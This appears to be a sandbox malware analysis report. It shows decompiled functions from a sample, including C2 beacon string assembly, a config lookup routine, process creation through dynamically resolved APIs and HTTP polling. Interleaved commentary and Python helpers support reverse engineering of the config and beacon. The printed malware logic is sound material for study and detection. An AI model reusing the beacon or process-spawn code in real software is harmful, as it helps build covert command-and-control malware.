                                • Instruction ID: 867c9e8a1d8a5c6385b700b3f50074e88bbd129a853aa16f627eadc5748af779
                                • Opcode Fuzzy Hash: ef443b17eb561d085dbe8cf4dac3afaacb5b1adc21c9d40d031cbe8d6ee209ff
                                • Instruction Fuzzy Hash: A481B371E01606AFC720EBB8DD94EDB77ADEB4C6417680DA5A485D7100FB31E9868B60
                                Uniqueness

                                Uniqueness Score: -1.00%
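The config-parsing routine above never names its keys: each lookup passes E02BD9403 a per-call constant XORed with the seed at 0x2bdd2a4 (0x69b25f44 in this dump), and the returned string is converted with StrToIntExA using dwFlags 0, which accepts decimal only, so a hex-formatted value would leave the global at its default. When working from a report like this one, the first thing worth writing down is the effective 32-bit value each call actually passes, since that is what the key-name hash inside E02BD9403 has to produce. The Python below is an added example for this page, not code from the report or from the sample: it parses the call sites exactly as the decompiler prints them (the lines are copied inline as a constructed sample), derives seed ^ constant for each, decodes the two fallback-string dwords, and provides a generic matcher that takes whatever hash function the analyst later recovers. The hash algorithm of E02BD9403 is not shown on this page; the zlib.crc32 in the demo is only a placeholder that exercises the matcher and is not a claim about the sample.

```python
import re
import zlib
from typing import Callable, Dict, Iterable, List, Optional

# Constructed sample: the E02BD9403 call sites copied from the decompiled
# function above. Only the seed comment and the XOR constants matter here.
DECOMPILED_SAMPLE = """
_t86 =  *0x2bdd2a4; // 0x69b25f44
_t48 = E02BD9403(_t104, _t103, _t86 ^ 0x0cd926ce);
_t82 =  *0x2bdd2a4; // 0x69b25f44
_t49 = E02BD9403(_t104, _t103, _t82 ^ 0x3cd8b2cb);
_t78 =  *0x2bdd2a4; // 0x69b25f44
_t50 = E02BD9403(_t104, _t103, _t78 ^ 0x2878b929);
_t75 =  *0x2bdd2a4; // 0x69b25f44
_t51 = E02BD9403(_t104, _t103, _t75 ^ 0x261a367a);
_t70 =  *0x2bdd2a4; // 0x69b25f44
_t52 = E02BD9403(_t104, _t103, _t70 ^ 0xb9d404b2);
_t65 =  *0x2bdd2a4; // 0x69b25f44
_t53 = E02BD9403(_t104, _t103, _t65 ^ 0x3df17130);
_t61 =  *0x2bdd2a4; // 0x69b25f44
_t56 = E02BD9403(_t104, _t103, _t61 ^ 0xd2079859);
"""

# The two fallback-string dwords the decompiler annotates in the same function.
FALLBACK_DWORDS = {0x2bde252: 0x616d692f, 0x2bde791: 0x6976612e}

SEED_RE = re.compile(r"\*0x2bdd2a4;\s*//\s*0x([0-9a-fA-F]{1,8})")
CALL_RE = re.compile(r"E02BD9403\([^)]*\^\s*0x([0-9a-fA-F]{1,8})\)")


def parse_seed(text: str) -> int:
    """Return the seed value the decompiler printed for *0x2bdd2a4."""
    seeds = {int(m, 16) for m in SEED_RE.findall(text)}
    if len(seeds) != 1:
        raise ValueError(f"expected exactly one seed, found {sorted(map(hex, seeds))}")
    return seeds.pop()


def parse_xor_constants(text: str) -> List[int]:
    """Per-call XOR constants, in source order."""
    return [int(m, 16) for m in CALL_RE.findall(text)]


def effective_lookup_values(text: str) -> Dict[int, int]:
    """Map each printed constant to the value actually passed to E02BD9403."""
    seed = parse_seed(text)
    return {c: (seed ^ c) & 0xFFFFFFFF for c in parse_xor_constants(text)}


def dword_to_ascii(value: int) -> str:
    """Decode a 32-bit little-endian constant as the four bytes it was loaded from."""
    return value.to_bytes(4, "little").decode("ascii")


def find_key_names(targets: Iterable[int], candidates: Iterable[str],
                   hashfn: Callable[[bytes], int]) -> Dict[int, Optional[str]]:
    """Try candidate key names against the effective values with a supplied hash.

    hashfn is whatever E02BD9403 turns out to compute; this page does not show it.
    Unmatched targets map to None so the analyst sees what is still unknown.
    """
    targets = list(targets)
    wanted = set(targets)
    found: Dict[int, str] = {}
    for name in candidates:
        h = hashfn(name.encode("ascii")) & 0xFFFFFFFF
        if h in wanted and h not in found:
            found[h] = name
    return {t: found.get(t) for t in targets}


if __name__ == "__main__":
    values = effective_lookup_values(DECOMPILED_SAMPLE)
    for const, eff in values.items():
        print(f"seed ^ {const:#010x} = {eff:#010x}")
    for off, dw in FALLBACK_DWORDS.items():
        print(f"string at +{off:#x} starts with {dword_to_ascii(dw)!r}")
    # Placeholder hash and constructed word list: zlib.crc32 is NOT known to be
    # the sample's hash; this only shows how the matcher is driven.
    guesses = ["timer", "server", "host", "uri", "key"]
    print(find_key_names(values.values(), guesses, lambda b: zlib.crc32(b)))
```

Run it against the report text itself once the matching function has been lifted from E02BD9403; until then the effective values are the stable artefact to record, since they survive reseeding only if the XOR constants do.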

                                C-Code - Quality: 74%
                                			E02BD5450(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                				void* _v8;
                                				signed int _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* _v24;
                                				void* _v28;
                                				void* __ebx;
                                				void* __edi;
                                				long _t59;
                                				intOrPtr _t60;
                                				intOrPtr _t61;
                                				intOrPtr _t62;
                                				intOrPtr _t63;
                                				intOrPtr _t64;
                                				void* _t67;
                                				intOrPtr _t68;
                                				int _t71;
                                				void* _t72;
                                				void* _t73;
                                				void* _t75;
                                				void* _t78;
                                				intOrPtr _t82;
                                				intOrPtr _t86;
                                				intOrPtr* _t88;
                                				void* _t94;
                                				intOrPtr _t100;
                                				signed int _t104;
                                				char** _t106;
                                				int _t109;
                                				intOrPtr* _t112;
                                				intOrPtr* _t114;
                                				intOrPtr* _t116;
                                				intOrPtr* _t118;
                                				intOrPtr _t121;
                                				intOrPtr _t126;
                                				int _t130;
                                				CHAR* _t132;
                                				intOrPtr _t133;
                                				void* _t134;
                                				void* _t143;
                                				int _t144;
                                				void* _t145;
                                				intOrPtr _t146;
                                				void* _t148;
                                				long _t152;
                                				intOrPtr* _t153;
                                				intOrPtr* _t154;
                                				intOrPtr* _t157;
                                				void* _t158;
                                				void* _t160;
                                
                                				_t143 = __edx;
                                				_t134 = __ecx;
                                				_t59 = __eax;
                                				_v12 = 8;
                                				if(__eax == 0) {
                                					_t59 = GetTickCount();
                                				}
                                				_t60 =  *0x2bdd018; // 0xefcf766a
                                				asm("bswap eax");
                                				_t61 =  *0x2bdd014; // 0x3a87c8cd
                                				_t132 = _a16;
                                				asm("bswap eax");
                                				_t62 =  *0x2bdd010; // 0xd8d2f808
                                				asm("bswap eax");
                                 				_t63 = E02BDD00C; // 0xeec43f25; decompiler label for the read of *0x2bdd00c, the fourth config dword
                                				asm("bswap eax");
                                				_t64 =  *0x2bdd2a8; // 0x242a5a8
                                 				_t3 = _t64 + 0x2bde633; // 0x74666f73 = "soft" little-endian, first four bytes of the wsprintfA format string
                                 				_t144 = wsprintfA(_t132, _t3, 3, 0x3d163, _t63, _t62, _t61, _t60,  *0x2bdd02c,  *0x2bdd004, _t59); // 0x3d163 = 250211; the four bswapped config dwords follow; *0x2bdd02c and *0x2bdd004 are the StrToIntExA results stored by the config parser above
                                				_t67 = E02BD3288();
                                				_t68 =  *0x2bdd2a8; // 0x242a5a8
                                 				_t4 = _t68 + 0x2bde673; // 0x74707526 = "&upt" little-endian, start of the next format string
                                				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
                                				_t160 = _t158 + 0x38;
                                				_t145 = _t144 + _t71;
                                				_t72 = E02BD831C(_t134);
                                				_t133 = __imp__; // 0x74e05520
                                				_v8 = _t72;
                                				if(_t72 != 0) {
                                					_t126 =  *0x2bdd2a8; // 0x242a5a8
                                 					_t7 = _t126 + 0x2bde8d4; // 0x736e6426 = "&dns" little-endian
                                					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
                                					_t160 = _t160 + 0xc;
                                					_t145 = _t145 + _t130;
                                					HeapFree( *0x2bdd238, 0, _v8);
                                				}
                                				_t73 = E02BD9267();
                                				_v8 = _t73;
                                				if(_t73 != 0) {
                                					_t121 =  *0x2bdd2a8; // 0x242a5a8
                                 					_t11 = _t121 + 0x2bde8dc; // 0x6f687726 = "&who" little-endian
                                					wsprintfA(_t145 + _a16, _t11, _t73);
                                					_t160 = _t160 + 0xc;
                                					HeapFree( *0x2bdd238, 0, _v8);
                                				}
                                				_t146 =  *0x2bdd32c; // 0x50095b0
                                				_t75 = E02BD284E(0x2bdd00a, _t146 + 4);
                                				_t152 = 0;
                                				_v20 = _t75;
                                				if(_t75 == 0) {
                                					L26:
                                					HeapFree( *0x2bdd238, _t152, _a16);
                                					return _v12;
                                				} else {
                                					_t78 = RtlAllocateHeap( *0x2bdd238, 0, 0x800);
                                					_v8 = _t78;
                                					if(_t78 == 0) {
                                						L25:
                                						HeapFree( *0x2bdd238, _t152, _v20);
                                						goto L26;
                                					}
                                					E02BD3239(GetTickCount());
                                					_t82 =  *0x2bdd32c; // 0x50095b0
                                					__imp__(_t82 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t86 =  *0x2bdd32c; // 0x50095b0
                                					__imp__(_t86 + 0x40);
                                					_t88 =  *0x2bdd32c; // 0x50095b0
                                					_t148 = E02BD7B8D(1, _t143, _a16,  *_t88);
                                					_v28 = _t148;
                                					asm("lock xadd [eax], ecx");
                                					if(_t148 == 0) {
                                						L24:
                                						HeapFree( *0x2bdd238, _t152, _v8);
                                						goto L25;
                                					}
                                					StrTrimA(_t148, 0x2bdc28c);
                                					_push(_t148);
                                					_t94 = E02BDA677();
                                					_v16 = _t94;
                                					if(_t94 == 0) {
                                						L23:
                                						HeapFree( *0x2bdd238, _t152, _t148);
                                						goto L24;
                                					}
                                					_t153 = __imp__;
                                					 *_t153(_t148, _a4);
                                					 *_t153(_v8, _v20);
                                					_t154 = __imp__;
                                					 *_t154(_v8, _v16);
                                					_t100 = E02BD7B3B( *_t154(_v8, _t148), _v8);
                                					_a4 = _t100;
                                					if(_t100 == 0) {
                                						_v12 = 8;
                                						L21:
                                						E02BD5433();
                                						L22:
                                						HeapFree( *0x2bdd238, 0, _v16);
                                						_t152 = 0;
                                						goto L23;
                                					}
                                					_t104 = E02BD9F33(_t133, 0xffffffffffffffff, _t148,  &_v24);
                                					_v12 = _t104;
                                					if(_t104 == 0) {
                                						_t157 = _v24;
                                						_v12 = E02BD137B(_t157, _a4, _a8, _a12);
                                						_t112 =  *((intOrPtr*)(_t157 + 8));
                                						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
                                						_t114 =  *((intOrPtr*)(_t157 + 8));
                                						 *((intOrPtr*)( *_t114 + 8))(_t114);
                                						_t116 =  *((intOrPtr*)(_t157 + 4));
                                						 *((intOrPtr*)( *_t116 + 8))(_t116);
                                						_t118 =  *_t157;
                                						 *((intOrPtr*)( *_t118 + 8))(_t118);
                                						E02BD8B22(_t157);
                                					}
                                					if(_v12 != 0x10d2) {
                                						L16:
                                						if(_v12 == 0) {
                                							_t106 = _a8;
                                							if(_t106 != 0) {
                                								_t149 =  *_t106;
                                								_t155 =  *_a12;
                                								wcstombs( *_t106,  *_t106,  *_a12);
                                								_t109 = E02BD7953(_t149, _t149, _t155 >> 1);
                                								_t148 = _v28;
                                								 *_a12 = _t109;
                                							}
                                						}
                                						goto L19;
                                					} else {
                                						if(_a8 != 0) {
                                							L19:
                                							E02BD8B22(_a4);
                                							if(_v12 == 0 || _v12 == 0x10d2) {
                                								goto L22;
                                							} else {
                                								goto L21;
                                							}
                                						}
                                						_v12 = _v12 & 0x00000000;
                                						goto L16;
                                					}
                                				}
                                			}
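E02BD5450 above assembles the outbound request string: wsprintfA is given a format string whose first bytes are "soft", the literal 3, the constant 0x3d163, the four config dwords at 0x2bdd00c..0x2bdd018 after `bswap eax`, the two integers the config parser earlier stored at 0x2bdd02c and 0x2bdd004, and either the caller's __eax or GetTickCount() when __eax is zero. The bswap before a hex-style print is the detail worth recognising when matching this code to captured traffic: reversing a little-endian dword and printing it as %08x yields the bytes in the order they sit in memory, so the identifier in the beacon is simply the raw 16 bytes of the config block. The Python below is an added example for this page, not code from the report or the sample, and it reproduces that argument order with the values the report annotates. The format string's conversion specifiers are not shown on the page, so the %08x rendering is an assumption used only to illustrate the identity.

```python
from typing import Dict, List

# Config dwords as the decompiler annotates them in E02BD5450 (address -> value).
CONFIG_DWORDS: Dict[int, int] = {
    0x2bdd00c: 0xeec43f25,
    0x2bdd010: 0xd8d2f808,
    0x2bdd014: 0x3a87c8cd,
    0x2bdd018: 0xefcf766a,
}
SOFT_FIELD = 3           # first argument after the format string
VERSION_FIELD = 0x3d163  # second argument, 250211 decimal

# First four bytes of each format string the decompiler comments on.
FORMAT_FRAGMENTS = {0x2bde633: 0x74666f73, 0x2bde673: 0x74707526,
                    0x2bde8d4: 0x736e6426, 0x2bde8dc: 0x6f687726}


def bswap32(value: int) -> int:
    """x86 `bswap eax`: reverse the byte order of a 32-bit value."""
    return int.from_bytes((value & 0xFFFFFFFF).to_bytes(4, "little"), "big")


def fragment_text(dword: int) -> str:
    """Little-endian dword -> the four ASCII bytes it was loaded from."""
    return dword.to_bytes(4, "little").decode("ascii")


def memory_order_hex(dwords: Dict[int, int]) -> str:
    """Hex of the raw bytes, lowest address first, as a memory dump shows them."""
    return b"".join(dwords[a].to_bytes(4, "little") for a in sorted(dwords)).hex()


def printed_hex_after_bswap(dwords: Dict[int, int]) -> str:
    """What four consecutive %08x of the bswapped dwords would print.

    The %08x specifiers are an assumption; the page shows only "soft" of the format.
    """
    return "".join(f"{bswap32(dwords[a]):08x}" for a in sorted(dwords))


def beacon_arguments(eax: int, cfg_2bdd02c: int, cfg_2bdd004: int,
                     tick_count: int, dwords: Dict[int, int] = CONFIG_DWORDS) -> List[int]:
    """Argument list in the order the decompiled wsprintfA call passes it.

    In the sample an __eax of 0 is replaced by GetTickCount(); tick_count stands
    in for that call. cfg_2bdd02c / cfg_2bdd004 are the two StrToIntExA results
    the config parser stored earlier.
    """
    last = eax if eax != 0 else tick_count
    swapped = [bswap32(dwords[a]) for a in sorted(dwords)]  # 0x2bdd00c first, as _t63.._t60
    return [SOFT_FIELD, VERSION_FIELD, *swapped, cfg_2bdd02c, cfg_2bdd004, last]


if __name__ == "__main__":
    print(memory_order_hex(CONFIG_DWORDS))
    print(printed_hex_after_bswap(CONFIG_DWORDS) == memory_order_hex(CONFIG_DWORDS))
    print([hex(a) for a in beacon_arguments(0, 0, 0, tick_count=0x1234)])
    for off, dw in FORMAT_FRAGMENTS.items():
        print(f"string at +{off:#x} starts with {fragment_text(dw)!r}")
```

The practical consequence: when carving the identifier out of a memory dump for correlation with proxy logs, take the 16 bytes at 0x2bdd00c as they are, without any per-dword reordering.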


                                APIs
                                • GetTickCount.KERNEL32 ref: 02BD5464
                                • wsprintfA.USER32 ref: 02BD54B4
                                • wsprintfA.USER32 ref: 02BD54D1
                                • wsprintfA.USER32 ref: 02BD54FD
                                • HeapFree.KERNEL32(00000000,?), ref: 02BD550F
                                • wsprintfA.USER32 ref: 02BD5530
                                • HeapFree.KERNEL32(00000000,?), ref: 02BD5540
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD556E
                                • GetTickCount.KERNEL32 ref: 02BD557F
                                • RtlEnterCriticalSection.NTDLL(05009570), ref: 02BD5593
                                • RtlLeaveCriticalSection.NTDLL(05009570), ref: 02BD55B1
                                  • Part of subcall function 02BD7B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7691C740,?,?,02BD9DA0,?,050095B0), ref: 02BD7BB8
                                  • Part of subcall function 02BD7B8D: lstrlen.KERNEL32(?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BC0
                                  • Part of subcall function 02BD7B8D: strcpy.NTDLL ref: 02BD7BD7
                                  • Part of subcall function 02BD7B8D: lstrcat.KERNEL32(00000000,?), ref: 02BD7BE2
                                  • Part of subcall function 02BD7B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02BD9DA0,?,050095B0), ref: 02BD7BFF
                                • StrTrimA.SHLWAPI(00000000,02BDC28C,?,050095B0), ref: 02BD55E8
                                  • Part of subcall function 02BDA677: lstrlen.KERNEL32(05009B08,00000000,00000000,7691C740,02BD9DCB,00000000), ref: 02BDA687
                                  • Part of subcall function 02BDA677: lstrlen.KERNEL32(?), ref: 02BDA68F
                                  • Part of subcall function 02BDA677: lstrcpy.KERNEL32(00000000,05009B08), ref: 02BDA6A3
                                  • Part of subcall function 02BDA677: lstrcat.KERNEL32(00000000,?), ref: 02BDA6AE
                                • lstrcpy.KERNEL32(00000000,?), ref: 02BD5609
                                • lstrcpy.KERNEL32(?,?), ref: 02BD5611
                                • lstrcat.KERNEL32(?,?), ref: 02BD561F
                                • lstrcat.KERNEL32(?,00000000), ref: 02BD5625
                                  • Part of subcall function 02BD7B3B: lstrlen.KERNEL32(?,00000000,05009D18,00000000,02BD5142,05009F3B,?,?,?,?,?,69B25F44,00000005,02BDD00C), ref: 02BD7B42
                                  • Part of subcall function 02BD7B3B: mbstowcs.NTDLL ref: 02BD7B6B
                                  • Part of subcall function 02BD7B3B: memset.NTDLL ref: 02BD7B7D
                                • wcstombs.NTDLL ref: 02BD56B6
                                  • Part of subcall function 02BD137B: SysAllocString.OLEAUT32(?), ref: 02BD13B6
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                • HeapFree.KERNEL32(00000000,?,?), ref: 02BD56F7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BD5703
                                • HeapFree.KERNEL32(00000000,?,?,050095B0), ref: 02BD570F
                                • HeapFree.KERNEL32(00000000,?), ref: 02BD571B
                                • HeapFree.KERNEL32(00000000,?), ref: 02BD5727
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID: Ut
                                • API String ID: 3748877296-8415677
                                • Opcode ID: a8dcbe71af2e9fe71fa0681f0a7a36a8146bcd36b3ed6a2bf1ec07647cf22d56
                                • Instruction ID: ac49fbb68161c1187ea88acebd4489ae435b12f9b2d3f53e8990956eb2389e65
                                • Opcode Fuzzy Hash: a8dcbe71af2e9fe71fa0681f0a7a36a8146bcd36b3ed6a2bf1ec07647cf22d56
                                • Instruction Fuzzy Hash: C9915972941109AFCB119FA8DC98AEEBBB9EF08390F544895F444D7260EB31D961DF60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 73%
                                			E02BD3485(void* __eax, void* __ecx) {
                                				long _v8;
                                				char _v12;
                                				void* _v16;
                                				void* _v28;
                                				long _v32;
                                				void _v104;
                                				char _v108;
                                				long _t36;
                                				intOrPtr _t40;
                                				intOrPtr _t47;
                                				intOrPtr _t50;
                                				void* _t58;
                                				void* _t68;
                                				intOrPtr* _t70;
                                				intOrPtr* _t71;
                                
                                				_t1 = __eax + 0x14; // 0x74183966
                                				_t69 =  *_t1;
                                				_t36 = E02BD4944(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                				_v8 = _t36;
                                				if(_t36 != 0) {
                                					L12:
                                					return _v8;
                                				}
                                				E02BDA789( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                				_t40 = _v12(_v12);
                                				_v8 = _t40;
                                				if(_t40 == 0 && ( *0x2bdd260 & 0x00000001) != 0) {
                                					_v32 = 0;
                                					asm("stosd");
                                					asm("stosd");
                                					asm("stosd");
                                					_v108 = 0;
                                					memset( &_v104, 0, 0x40);
                                					_t47 =  *0x2bdd2a8; // 0x242a5a8
                                					_t18 = _t47 + 0x2bde3e6; // 0x73797325
                                					_t68 = E02BD7912(_t18);
                                					if(_t68 == 0) {
                                						_v8 = 8;
                                					} else {
                                						_t50 =  *0x2bdd2a8; // 0x242a5a8
                                						_t19 = _t50 + 0x2bde747; // 0x5008cef
                                						_t20 = _t50 + 0x2bde0af; // 0x4e52454b
                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                						if(_t71 == 0) {
                                							_v8 = 0x7f;
                                						} else {
                                							_v108 = 0x44;
                                							E02BD3179();
                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                							_push(1);
                                							E02BD3179();
                                							if(_t58 == 0) {
                                								_v8 = GetLastError();
                                							} else {
                                								CloseHandle(_v28);
                                								CloseHandle(_v32);
                                							}
                                						}
                                						HeapFree( *0x2bdd238, 0, _t68);
                                					}
                                				}
                                				_t70 = _v16;
                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                				E02BD8B22(_t70);
                                				goto L12;
                                 			}

                                APIs
                                  • Part of subcall function 02BD4944: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD34A1,?,00000001,?,?,00000000,00000000), ref: 02BD4969
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD498B
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD49A1
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD49B7
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD49CD
                                  • Part of subcall function 02BD4944: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD49E3
                                • memset.NTDLL ref: 02BD34EF
                                  • Part of subcall function 02BD7912: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,02BD3508,73797325), ref: 02BD7923
                                  • Part of subcall function 02BD7912: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 02BD793D
                                • GetModuleHandleA.KERNEL32(4E52454B,05008CEF,73797325), ref: 02BD3525
                                • GetProcAddress.KERNEL32(00000000), ref: 02BD352C
                                • HeapFree.KERNEL32(00000000,00000000), ref: 02BD3594
                                  • Part of subcall function 02BD3179: GetProcAddress.KERNEL32(36776F57,02BD8BDC), ref: 02BD3194
                                • CloseHandle.KERNEL32(00000000,00000001), ref: 02BD3571
                                • CloseHandle.KERNEL32(?), ref: 02BD3576
                                • GetLastError.KERNEL32(00000001), ref: 02BD357A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                • String ID: Ut
                                • API String ID: 3075724336-8415677
                                • Opcode ID: 4c97ba8e2d3a1431167ff2553ce9e6726c347044b37f8af83766f1f6f42797b1
                                • Instruction ID: afbd4f31a881cee55d25169294fd6d1d25522d42d47e485590ce6c7359f1c90c
                                • Opcode Fuzzy Hash: 4c97ba8e2d3a1431167ff2553ce9e6726c347044b37f8af83766f1f6f42797b1
                                • Instruction Fuzzy Hash: 503133B2C00209AFDB10AFA4D888EDEBBFDEB04348F0149A5E645E7111E7359A54CF51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 27%
                                			E02BD8F85(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				long _v16;
                                				intOrPtr _v20;
                                				signed int _v24;
                                				void* __esi;
                                				long _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t46;
                                				void* _t48;
                                				void* _t49;
                                				void* _t50;
                                				intOrPtr _t54;
                                				intOrPtr _t57;
                                				void* _t58;
                                				void* _t59;
                                				void* _t60;
                                				intOrPtr _t66;
                                				void* _t71;
                                				void* _t74;
                                				intOrPtr _t75;
                                				void* _t77;
                                				intOrPtr _t79;
                                				intOrPtr* _t80;
                                				intOrPtr _t91;
                                
                                				_t79 =  *0x2bdd33c; // 0x5009bc0
                                				_v24 = 8;
                                				_t43 = GetTickCount();
                                				_push(5);
                                				_t74 = 0xa;
                                				_v16 = _t43;
                                				_t44 = E02BD9B1B(_t74,  &_v16);
                                				_v8 = _t44;
                                				if(_t44 == 0) {
                                					_v8 = 0x2bdc18c;
                                				}
                                				_t46 = E02BD7F8B(_t79);
                                				_v12 = _t46;
                                				if(_t46 != 0) {
                                					_t80 = __imp__;
                                					_t48 =  *_t80(_v8, _t71);
                                					_t49 =  *_t80(_v12);
                                					_t50 =  *_t80(_a4);
                                					_t54 = E02BD1525(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                					_v20 = _t54;
                                					if(_t54 != 0) {
                                						_t75 =  *0x2bdd2a8; // 0x242a5a8
                                						_t16 = _t75 + 0x2bdeb08; // 0x530025
                                						 *0x2bdd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                						_push(4);
                                						_t77 = 5;
                                						_t57 = E02BD9B1B(_t77,  &_v16);
                                						_v8 = _t57;
                                						if(_t57 == 0) {
                                							_v8 = 0x2bdc190;
                                						}
                                						_t58 =  *_t80(_v8);
                                						_t59 =  *_t80(_v12);
                                						_t60 =  *_t80(_a4);
                                						_t91 = E02BD1525(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                						if(_t91 == 0) {
                                							E02BD8B22(_v20);
                                						} else {
                                							_t66 =  *0x2bdd2a8; // 0x242a5a8
                                							_t31 = _t66 + 0x2bdec28; // 0x73006d
                                							 *0x2bdd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                							 *_a16 = _v20;
                                							_v24 = _v24 & 0x00000000;
                                							 *_a20 = _t91;
                                						}
                                					}
                                					E02BD8B22(_v12);
                                				}
                                				return _v24;
                                 			}

                                APIs
                                • GetTickCount.KERNEL32 ref: 02BD8F9A
                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 02BD8FDA
                                • lstrlen.KERNEL32(00000000), ref: 02BD8FE3
                                • lstrlen.KERNEL32(00000000), ref: 02BD8FEA
                                • lstrlenW.KERNEL32(80000002), ref: 02BD8FF7
                                • lstrlen.KERNEL32(?,00000004), ref: 02BD9057
                                • lstrlen.KERNEL32(?), ref: 02BD9060
                                • lstrlen.KERNEL32(?), ref: 02BD9067
                                • lstrlenW.KERNEL32(?), ref: 02BD906E
                                  • Part of subcall function 02BD8B22: RtlFreeHeap.NTDLL(00000000,00000000,02BD131A,00000000,?,?,00000000), ref: 02BD8B2E
                                Memory Dump Source
                                • Source File: 00000003.00000002.797669597.0000000002BD1000.00000020.00020000.sdmp, Offset: 02BD0000, based on PE: true
                                 • Associated: 00000003.00000002.797660622.0000000002BD0000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797695612.0000000002BDC000.00000002.00020000.sdmp
                                 • Associated: 00000003.00000002.797701794.0000000002BDD000.00000004.00020000.sdmp
                                 • Associated: 00000003.00000002.797717049.0000000002BDF000.00000002.00020000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_2bd0000_regsvr32.jbxd
                                Similarity
                                • API ID: lstrlen$CountFreeHeapTick
                                • String ID:
                                • API String ID: 2535036572-0
                                • Opcode ID: 0782615c1b639f62c504b5624ef4a52f44568eccd2e6041969810b1bd57ce331
                                • Instruction ID: 252fa5d692d5a5e440b15fe1de650327c59d86a555f50d84f889c09b0222cb5b
                                • Opcode Fuzzy Hash: 0782615c1b639f62c504b5624ef4a52f44568eccd2e6041969810b1bd57ce331
                                • Instruction Fuzzy Hash: 70416B76D00619FBCF11AFA4DC48ADEBBB5EF44358F014491E904A7210EB36DA61DF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02BD57DD(void* __ecx, void* __esi) {
                                				long _v8;
                                				long _v12;
                                				long _v16;
                                				long _v20;
                                				long _t34;
                                				long _t39;
                                				long _t42;
                                				long _t56;
                                				void* _t58;
                                				void* _t59;
                                				void* _t61;
                                
                                				_t61 = __esi;
                                				_t59 = __ecx;
                                				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                				do {
                                					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                					_v20 = _t34;
                                					if(_t34 != 0) {
                                						L3:
                                						_v8 = 4;
                                						_v16 = 0;
                                						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                							_t39 = GetLastError();
                                							_v12 = _t39;
                                							if(_v20 == 0 || _t39 != 0x2ef3) {
                                								L15:
                                								return _v12;
                                							} else {
                                								goto L11;
                                							}
                                						}
                                						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                							goto L11;
                                						} else {
                                							_v16 = 0;
